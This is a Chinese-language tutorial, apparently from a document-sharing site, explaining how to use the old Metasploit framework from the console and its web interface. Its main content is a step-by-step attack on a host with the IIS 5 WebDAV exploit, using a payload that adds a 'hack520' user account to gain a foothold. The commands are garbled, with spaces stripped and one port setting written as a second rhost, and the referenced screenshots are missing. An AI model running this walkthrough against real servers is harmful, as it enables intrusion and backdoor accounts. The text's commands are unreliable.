强大溢出工具包 Metasploit使用教程Word格式.docx
《强大溢出工具包 Metasploit使用教程Word格式.docx》由会员分享,可在线阅读,更多相关《强大溢出工具包 Metasploit使用教程Word格式.docx(11页珍藏版)》请在冰豆网上搜索。
如图1
看到很多命令吧,我们来解释一下
“?
”帮助
“cd”:
这个命令大家都熟悉,和WIN下面一样,切换目录
“exit”这个就是退出的意思
“info”显示当前程序信息
“quit”退出程序
“reload”加载exploit和payloads
“save”保存设置
“setg”设置一个环境变量
“show”显示当前可用的exploit
“use”选择一个exp
“version”显示程序版本
这么多命令看起来肯定有些晕了吧其实用到的就"
show"
"
info"
use"
这3个,我们来看看是怎么使用的
这个程序就是一个大的工具包,集成了N多EXPLOIT,我们可以用showexploits看看有哪些exploit程序,如图2
看到了吧?
这么多溢出程序,想用哪个就用哪个,省得整天找。
这么多的东西该怎么用呢?
?
比如我想用一个溢出程序,肯定得先看他的帮助了解使用方法。
这就得用到info命令啦。
这个命令就是显示溢出程序的详细信息,比如我们想看下iis50_webdav_ntdll这个溢出程序的用法,就在命令行下输入infoexploitiis50_webdav_ntdll,就会看到图3所示
这里只是查看Exploit的信息,我们还可查看shellcode的信息。
在这个工具包中,可以定义自己需要的shellcode.在命令行下输入"
showpayloads"
可以看到可用的shellcode列表,如图4
左边是名字,右边是说明。
我们可以用info命令查看shellcode的具体信息,输入命令infopayloadcmd_generic如图5
这里要注意的只是required和options,这里required表示必选options表示可选可不选,以linux开头的就是针对linux系统的shellcode,以CMD和WIN开头的就是针对所有WIN系统。
在溢出过程中一定要选对应的SHELLCODE才能成功。
好,现在我们来看实战一下,我们拿webdav的溢出程序做例子,在命令中输入useiis50_webdav_ntdll,然后再输入showoptions查看要输入的内容,如图6
然后我们在命令行下输入setrhost192.168.1.223setrhost80如图7
到这里了,得指定shellcode,输入以下命令:
setpayloadwinexec输完了按回车然后再输入setcmdnetuserhack520/add如图8
好了现在可以向192.168.1.223发起进攻了,输入showtargets可以看到操作系统的代号,大家都知道webdav走针对2000系统,输入settargets0如图9
没有什么问题了就输入Exploit。
如果对方服务器存在这个漏洞话就会得到shell了
Metasploit下载:
图形界面下使用Metasploit
Metasploit图形界面的使用方法和命令行下没有太大的区别,只不过是操作方式的不同罢了:
到Metasploit的安装目录下找到Msfweb.bat文件双击运行,一会后程序提示执行成功,如图10所示:
图10
然后打开IE,在地址栏中输入http:
//127.0.0.1:
55555等一会后看到图11所示的IE窗口:
图11
在想要使用的溢出工具包上单击鼠标左键后进入到基本设置窗口,我们仍然以iis50_webdav_ntdll为例,如图12所示:
图12
单击“selectpayload”选项进入Payload选择界面,如图13所示:
图13
选择合适的Payload后就进入基本信息的设定界面了,如图14所示:
图14
这里的设置和命令行中介绍的是基本一致的,我就不做额外的说明了。
都设定好后,你可以点VulnerabilityCheck检查看看目标系统有没有相应的漏洞,或者点LaunchExploit进行攻击!
从上面的操作可以看出Metasploit的使用方法是非常简单的,而且功能也是很强大的,对于我们日常的渗透来说是一款很实用的工具。
当然,你也许并不满足于软件自带的这些溢出工具,你完全可以自己向这个工具中添加任何你认为对你有用的溢出工具包。
相信随着大家的努力,这个工具包可以更加完善!